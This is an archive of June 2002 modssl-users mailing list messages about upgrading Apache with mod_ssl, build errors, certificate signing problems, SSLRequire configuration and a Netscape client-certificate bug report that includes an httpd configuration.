	from scrabble.freeuk.net id UAA26591; Wed, 19 Jun 2002 20:45:33 +0200 (MET DST)
Received: from du-038-0004.access.clara.net ([217.158.30.4] helo=charon)
	by scrabble.freeuk.net with smtp (Exim 3.36 #5)
	id 17KkSI-0007rW-00
	for modssl-users@modssl.org; Wed, 19 Jun 2002 19:45:22 +0100
Message-ID: <005d01c217c1$8d881d30$041e9ed9@charon>
From: "Madhon" 
To: 
References: <000301c217c0$701db530$1f00a8c0@electrocute>
Subject: Re: mod_ssl for apache 2.0.39
Date: Wed, 19 Jun 2002 19:45:57 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Madhon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

there is no seperate modssl for 2.0.39 it comes as part of the source code
----- Original Message ----- 
From: Richard Pijnenburg 
To: modssl-users@modssl.org 
Sent: Wednesday, June 19, 2002 7:37 PM
Subject: mod_ssl for apache 2.0.39


When will there be an mod_ssl version for apache 2.0.39 ???
 
Greetz,
 
Richard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:47:42 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26695; Wed, 19 Jun 2002 20:46:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id UAA26601; Wed, 19 Jun 2002 20:45:42 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 19 Jun 2002 11:45:35 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 19 Jun 2002 18:45:35 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Apache 1.3.26 Upgrade Question
Date: Wed, 19 Jun 2002 18:45:35 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 19 Jun 2002 18:45:35.0972 (UTC) FILETIME=[7FC7C240:01C217C1]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

We are currently running Apache 1.3.20 with mod_ssl.
(SSL installed using: Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32)

We wish to upgrade our Apache server to 1.3.26 along with mod_ssl.

While i notice that the mod_ssl-2.8.9-1.3.26.tar.gz file has already been 
released, we are looking for the Apache_1.3.26-Mod_SSL_2.8.9x-OpenSSL_x 
file.

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in the 
http://www.modssl.org/contrib/ area.

We also wish to know if the SSL certificate has to be re-created after 
Apache is upgraded to 1.3.26 with the new mod_SSL.

Any helpful tips on the upgrade process would be higly appreciated.

Thanks.
-Jim.

_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:48:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26817; Wed, 19 Jun 2002 20:47:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from aeschi.ch.eu.org id UAA26692; Wed, 19 Jun 2002 20:46:38 +0200 (MET DST)
Received: from catv.aeschi.ch.eu.org (catv.aeschi.ch.eu.org [213.207.68.24])
	by aeschi.ch.eu.org (8.12.4/8.12.4) with ESMTP id g5JIkTnt006942
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=OK)
	for ; Wed, 19 Jun 2002 20:46:35 +0200 (MET DST)
Date: Wed, 19 Jun 2002 20:46:29 +0200 (W. Europe Daylight Time)
From: Al Smith 
To: modssl-users@modssl.org
Subject: Re: mod_ssl for apache 2.0.39
In-Reply-To: <000301c217c0$701db530$1f00a8c0@electrocute>
Message-ID: 
X-X-Sender: ajs@aeschi.ch.eu.org
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Filter-Version: 1.9 (aeschi)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Al Smith 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

mod_ssl has been integrated into the 2.0.39 distribution.
there is no separate piece to fetch for ssl support.

al.


On Wed, 19 Jun 2002, Richard Pijnenburg wrote:

> When will there be an mod_ssl version for apache 2.0.39 ???
>
> Greetz,
>
> Richard
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:51:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27064; Wed, 19 Jun 2002 20:49:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from server.cartmanager.net id UAA26944; Wed, 19 Jun 2002 20:48:42 +0200 (MET DST)
Received: from Jason (dhcp120.cartmanager.net [207.173.85.120])
	(authenticated)
	by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g5JIcLu17410;
	Wed, 19 Jun 2002 12:38:21 -0600
Message-ID: <016301c217c1$ededd930$7855adcf@Jason>
From: "Jason" 
To: 
Cc: "Richard Pijnenburg" 
References: <000301c217c0$701db530$1f00a8c0@electrocute>
Subject: Re: mod_ssl for apache 2.0.39
Date: Wed, 19 Jun 2002 12:48:32 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0160_01C2178F.9E991570"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0160_01C2178F.9E991570
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

http://httpd.apache.org/docs-2.0/mod/mod_ssl.html
http://httpd.apache.org/docs-2.0/ssl/
  ----- Original Message -----=20
  From: Richard Pijnenburg=20
  To: modssl-users@modssl.org=20
  Sent: Wednesday, June 19, 2002 12:37 PM
  Subject: mod_ssl for apache 2.0.39


  When will there be an mod_ssl version for apache 2.0.39 ???

  =20

  Greetz,

  =20

  Richard


------=_NextPart_000_0160_01C2178F.9E991570
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











http://httpd.a=
pache.org/docs-2.0/mod/mod_ssl.html


http://httpd.apache.org/do=
cs-2.0/ssl/



  
----- Original Message ----- 

  From:=20
  Richard Pijnenburg =

  
  
Sent: Wednesday, June 19, 2002 =
12:37=20
  PM

  
Subject: mod_ssl for apache =
2.0.39

  


  

  
When will there be an mod_ssl version for apache 2.0.39=20
  ???

  
 

  
Greetz,

  
 

  
Richard


------=_NextPart_000_0160_01C2178F.9E991570--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:51:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27178; Wed, 19 Jun 2002 20:50:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA27115; Wed, 19 Jun 2002 20:50:06 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5JIlFd01755
	for ; Wed, 19 Jun 2002 14:47:15 -0400
Date: Wed, 19 Jun 2002 14:47:15 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 19 Jun 2002, Jim Lee wrote:

> We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in the
> http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

> We also wish to know if the SSL certificate has to be re-created after
> Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 21:50:42 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA02020; Wed, 19 Jun 2002 21:49:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta01-svc.ntlworld.com id VAA01990; Wed, 19 Jun 2002 21:49:09 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta01-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020619194908.TFVV16050.mta01-svc.ntlworld.com@ws>
          for ; Wed, 19 Jun 2002 20:49:08 +0100
Message-ID: <09e901c217c9$7bb610f0$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: apr_os_global_mutex_t
Date: Wed, 19 Jun 2002 20:42:43 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Whilst tryiny to install apache 2.0.39 over 2.0.36 following my previous
problems with mod_ssl.c I have hit this whilst at the make stage, can anyone
offer some insight?

unixd.c: In function `unixd_set_global_mutex_perms':
unixd.c:429: `apr_os_global_mutex_t' undeclared (first use in this function)
unixd.c:429: (Each undeclared identifier is reported only once
unixd.c:429: for each function it appears in.)
unixd.c:429: parse error before `osgmutex'
unixd.c:430: `osgmutex' undeclared (first use in this function)
make[3]: *** [unixd.lo] Error 1
make[3]: Leaving directory `/home/wserve/_s-store/httpd-2.0.39/os/unix'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/wserve/_s-store/httpd-2.0.39/os/unix'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/wserve/_s-store/httpd-2.0.39/os'
make: *** [all-recursive] Error 1


Thanks

Zac

===================================================

# Previous message #

===================================================

Have had an error with 'Failed to acquire global mutex lock' so downloaded
an updated version of mod_ssl.c from

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/mod_ssl.c?rev=1.63&c
ontent-type=text/vnd.viewcvs-markup

Then re-installed apache 2.0.36  with:
./configure --with-ssl=/usr/local/openssl --enable-ssl=shared --prefix=/usr/
local/ap

Now when I try to start apache I get:
Cannot load modules/mod_ssl.so into server: modules/mod_ssl.so undefined
symbol: ssl_log_ssl_error

Can anyone suggest where I should go from here?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 01:16:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA16090; Thu, 20 Jun 2002 01:15:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dragon.relcom.ru id BAA16026; Thu, 20 Jun 2002 01:15:04 +0200 (MET DST)
Received: from moiseev-kiae.dialup.relcom.ru ([193.125.222.69])
	by dragon.relcom.ru with asmtp 
	id 17Kof3-000JFd-00 for modssl-users@modssl.org; Thu, 20 Jun 2002 03:14:49 +0400
Mime-Version: 1.0
X-Sender: 0107.g23@g23.relcom.ru
Message-Id: 
In-Reply-To: <5.1.0.14.0.20020619155116.03155448@pophost.owl.co.uk>
References: <5.1.0.14.0.20020619155116.03155448@pophost.owl.co.uk>
Date: Thu, 20 Jun 2002 03:12:14 +0400
To: modssl-users@modssl.org
From: Ilya 
Subject: Re: sign.sh woes
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ilya 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>Hello all,
>
>I *know* this has been done to death before but I just can't find 
>any solutions anywhere on the net or in the archives: just lots of 
>descriptions of the problem!
>
>After running sign.sh I have the typical error:
>-----------------------------------------------------------
>Sign the certificate? [y/n]:y
>
>1 out of 1 certificate requests certified, commit? [y/n]y
>Write out database with 1 new entries
>Data Base Updated
>CA verifying: server.crt <-> CA cert
>server.crt: /C=UK/ST=Midlothian/L=Edinburgh/O=Panasonic 
>OWL/OU=R&D/CN=oscar-demo.owl.co.uk/Email=admin@oscar-demo.owl.co.uk
>error 18 at 0 depth lookup:self signed certificate
>/C=UK/ST=Midlothian/L=Edinburgh/O=Panasonic 
>OWL/OU=R&D/CN=oscar-demo.owl.co.uk/Email=admin@oscar-demo.owl.co.uk
>error 7 at 0 depth lookup:certificate signature failure
>--------------------------------------------------------------
>
>My directory has the server.csr, the ca.key and ca.crt.
>
>People have advised the use of the ssl.ca scripts in the contrib 
>area but this is basically the same sign script!
>
>Version: openssl-0.9.6
>
>Does anybody have any suggestions on this? Also, the best way to 
>clean up after it fails: just delete the generated certs db?
>
>Cheers,
>colm
>

I had same problem some months ago too. Looks like bug (feature? :) 
in openssl. If CA and certificate have same CN, signing falls with 
this error.  I don't saw this limitation in ssl rfcs, but now just 
use different CNs.

best

Ilya
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 06:12:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA16049; Thu, 20 Jun 2002 06:10:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA15690; Thu, 20 Jun 2002 06:08:11 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C5C624CE7A4; Thu, 20 Jun 2002 03:02:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D777A2883D; Wed, 19 Jun 2002 21:39:36 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id BAA12473; Wed, 19 Jun 2002 01:38:07 +0200 (MET DST)
Date: Wed, 19 Jun 2002 01:38:07 +0200 (MET DST)
Message-Id: <200206182338.BAA12473@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] PRIVATE: apache 1.3.26 (PR#720)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Michael Duncan
Version: 2.8.8
OS: RedHat 7.2
Submission from: (NULL) (216.224.74.74)


I was trying to apply the latest apache 1.3.26 to my server and the mod_ssl is
not allowing the install.  Is there any time line on when mod_ssl will support
1.3.26?

Thanks.

Results:

./configure --with-apache=/usr/src/apache_1.3.26
--with-ssl=/usr/src/openssl-0.9.6d
--with-crt=/usr/local/apache/conf/ssl.crt/server.crt
--with-key=/usr/local/apache/conf/ssl.key/server.key 
Configuring mod_ssl/2.8.8 for Apache/1.3.24
./configure:Error: The mod_ssl/2.8.8 can be used for Apache/1.3.24 only.
./configure:Error: Your Apache source tree under /usr/src/apache_1.3.26 is
version 1.3.26.
./configure:Hint:  Please use an extracted apache_1.3.24.tar.gz tarball
./configure:Hint:  with the --with-apache option, only.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 06:15:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA16150; Thu, 20 Jun 2002 06:10:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA15700; Thu, 20 Jun 2002 06:08:13 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 79B964CE798; Thu, 20 Jun 2002 03:02:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DDEE1286C5; Wed, 19 Jun 2002 21:38:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.filanet.dk id QAA06415; Tue, 18 Jun 2002 16:09:50 +0200 (MET DST)
Received: from filanet.dk (ras1.local.filanet.dk [192.168.1.21])
	by mail.filanet.dk (Postfix) with SMTP id 5A0407C018
	for ; Tue, 18 Jun 2002 14:09:35 +0000 (GMT)
Message-ID: <3D0F3FDB.3000706@filanet.dk>
Date: Tue, 18 Jun 2002 16:12:43 +0200
From: Lars Povlsen 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.9) Gecko/20020408
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLRequire use to enforce SSL for "almost all" files
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lars Povlsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello modssl-users!

I have wrestled with mod_ssl for most of the day trying to use 
SSLRequire to enforce SSL usage for all but a small list of php scripts 
in a directory.

I tried putting the following in a .htaccess file:

SSLRequire %{SCRIPT_FILENAME} !~ m/(signon|get_swimg|get_disksw)\.php$/

It did *not* work as intended..., I could still use non-ssl access to 
arbitrary scripts - only with "SSLRequireSSL" instead I saw some action 
- but I cannot use that as the listed exceptions have to be available 
"plain". Tried SSLLogLevel debug without any pointers to what was 
wrong... In fact not even trying to test on IP address was successfull.

I finally went to mod_rewrite to get the job done:

RewriteEngine        on
RewriteCond          %{HTTPS} !=on
RewriteCond          %{SCRIPT_FILENAME} !(signon|get_swimg|get_disksw)\.php$
RewriteRule          .* - [F]

- and that did the trick!

What was I doing wrong with SSLRequire - am I missing a point here - or 
*is* mod_rewrite the only way to do this?

Sincerely,

Lars Povlsen
--
Filanet Europe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 06:15:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA16255; Thu, 20 Jun 2002 06:11:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA15693; Thu, 20 Jun 2002 06:08:11 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 12FEC4CE794; Thu, 20 Jun 2002 03:02:56 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EB54928695; Wed, 19 Jun 2002 21:38:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from esmtp2.globalvalue.it id MAA21667; Tue, 18 Jun 2002 12:04:31 +0200 (MET DST)
Received: from svuns039-1.its.it (151.92.184.123) by esmtp2.globalvalue.it (6.5.019)
        id 3D0EFA9D00001B99 for modssl-users@modssl.org; Tue, 18 Jun 2002 12:04:26 +0200
Received: from svuns039.its.it (151.92.184.124) by svuns039-1.its.it (5.5.034)
        id 3CDE7C270035B906 for modssl-users@modssl.org; Tue, 18 Jun 2002 12:04:24 +0200
Received: from ex1unintd03.its.it (151.92.249.147) by svuns039.its.it (5.5.034)
        id 3CDE7C240034C2E2 for modssl-users@modssl.org; Tue, 18 Jun 2002 12:04:09 +0200
Received: by smtpout.its.it with Internet Mail Service (5.5.2654.52)
	id ; Tue, 18 Jun 2002 12:02:36 +0200
Message-ID: 
From: MOROZZO Valerio 
To: "'modssl-users@modssl.org'" 
Subject: apache 1.3.24 mod_proxy patch and ssl - fix to test
Date: Tue, 18 Jun 2002 11:59:16 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.52)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MOROZZO Valerio 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
   I usually use Apache in order to provide reverse proxy HTTP/HTTPS
services with mod_sll; depending ont the fact I have to use 1.3.24 version
(further version are not supported by mod_sll, if I don't get wrong), I
needed to patch the proxy module in order to solve two problems:

- cookie problem (resolved by Apache chunked_proxy official patch)
- keeyalive problem (resolved manually integrating proxy module 1.3.24 code
with 2.0 code)

So I defined a stable version of apache 1.3.24 that seems - from the first
test - to be ok both form http and https.

The matter is that module mod_ssl - in configuration phase - have to modify
the proxy module http_proxy.c and mod_proxy.c and I had to manually patch
that module with mod_ssl code get from .rej file in order to make it
working.

I don't know if there is also other patches for apache 1.3.24 and mod_ssl,
but if anyone is interested to my code let me know and I'll send him!

I'll will be very happy if this code will be helpful for other people with
my same problems, as I was happy to found the various pieces that made it on
the internet.


Thank you very much and Regards,
Valerio Morozzo
Archesis s.r.l. (www.archesis.it)
Torino (Italy)



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 06:16:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA16391; Thu, 20 Jun 2002 06:11:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA15686; Thu, 20 Jun 2002 06:08:09 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DF0AE4CE79C; Thu, 20 Jun 2002 03:02:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5DEBB28695; Wed, 19 Jun 2002 21:38:50 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id RAA11329; Tue, 18 Jun 2002 17:40:08 +0200 (MET DST)
Date: Tue, 18 Jun 2002 17:40:08 +0200 (MET DST)
Message-Id: <200206181540.RAA11329@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Netscape always asking client certificate (PR#719)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Thierry Pajot
Version: 2.8
OS: NT
Submission from: (NULL) (212.208.137.226)


I'm using mod_ssl on a 2.0.36 Apache Server on Windows NT.

In my configuration, client who want to access to URL like "/cert" have to
present a X509 Client Certificate. Anything but "/cert" is not protected.

When using Netscape communicator 4.75, with the following configuration,
Netscape ask me for client certificate at each page !!! When i'm using Internet
Explorer 6 it works ok.

For testing, i have 2 certificate in my Netscape browser configuration so each
time a window is opened for me to choose which certifitate i want to use.

This is my Apache configuration (sorry it's large) :

# begin
ServerName tpa.axe-dci.fr:88 
Listen 193.56.53.65:88 
LoadModule log_config_module modules/mod_log_config.so 
LoadModule mime_module modules/mod_mime.so 
LoadModule ssl_module modules/mod_ssl.so 
LoadModule setenvif_module modules/mod_setenvif.so 
ServerRoot "C:/Apache2" 
PidFile conf/apache-wapis.pid 
ServerSignature Off 
ServerTokens Full 
UseCanonicalName On 
Timeout 300 
KeepAlive On 
KeepAliveTimeout 15 
MaxKeepAliveRequests 100 
MaxRequestsPerChild 0 
ThreadsPerChild 50 
ListenBackLog 511 
HostnameLookups Off 
ErrorLog logs/error-wapis.log 
LogLevel warn 
LogFormat "%h %l %u %t \"%r\" %>s %U %b %v %p \"%q\"" custom 
CustomLog logs/access-wapis.log custom 
LoadModule dciweb_module c:/pdci/dciweb/wapi/apache2/dciweb.dll 
RepIni C:\pdci\dciweb\wapi\apache2 
AddType application/x-x509-ca-cert .crt 
AddType application/x-pkcs7-crl    .crl 
SSLPassPhraseDialog  exec:C:/Apache2/conf/sslpsw-wapis.cmd 
SSLSessionCache shm:logs/ssl_scache(512000) 
SSLSessionCacheTimeout 300 
SSLMutex sem 
SSLRandomSeed startup file:C:\pdci\dciweb\wapi\apache2/dciweb.rnd 
SSLRandomSeed connect file:C:\pdci\dciweb\wapi\apache2/dciweb.rnd 
SSLLog logs/ssl_engine_log 
SSLLogLevel warn 
SSLEngine on 
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0
force-response-1.0 
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile C:\pdci\dciweb\wapi\apache2/dciweb.crt 
SSLCertificateKeyFile C:\pdci\dciweb\wapi\apache2/dciweb.key 
SSLVerifyClient none 
 
  SSLVerifyClient require 
  SSLVerifyDepth 1 
  SSLCACertificateFile C:\pdci\dciweb\wapi\apache2/dciwebca.crt 
  SSLOptions +ExportCertData 
 
TypesConfig conf/mime.types 
DefaultType text/plain 
DocumentRoot "c:/pdci/dciweb/wapi/apache2/pub/inetpubs" 
 
  AllowOverride None 
   
    Options None 
    SetHandler dci-requete 
   
 
 
  BrowserMatch "Mozilla/2" nokeepalive 
  BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 
  BrowserMatch "RealPlayer 4\.0" force-response-1.0 
  BrowserMatch "Java/1\.0" force-response-1.0 
  BrowserMatch "JDK/1\.0" force-response-1.0 
 
# end

Note that with the following configuration, the same as the first but without le
, Netscape ask me for client certificate only for the first page :

# begin
SSLVerifyClient require
SSLVerifyDepth 1
SSLCACertificateFile C:\pdci\dciweb\wapi\apache2/dciwebca.crt 
SSLOptions +ExportCertData 
# end

I think  modifies something in the SSL layer which causes problems to
Netscape (but not IE).

I have tried to add SSLOptions +OptRenegotiate but it doesnt work better.

Any idea to help me ?

Thanks.

Thierry.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 15:39:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28060; Thu, 20 Jun 2002 15:38:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id PAA27950; Thu, 20 Jun 2002 15:37:10 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 06:37:03 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 13:37:03 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Apache_1.3.26-Mod_SSL_x-OpenSSL_x - Emergency
Date: Thu, 20 Jun 2002 13:37:03 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 13:37:03.0859 (UTC) FILETIME=[901D3C30:01C2185F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

We immediately need the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file so that we 
can upgrade our Apache server to 1.3.26 with mod_ssl.

This is an emergency since we need to get this done immediately.

We have been constantly looking at the http://www.modssl.org/contrib/ area, 
with no luck.

We seek immediate attention from the mod_ssl user community.

Bye,
-Jim.

_________________________________________________________________
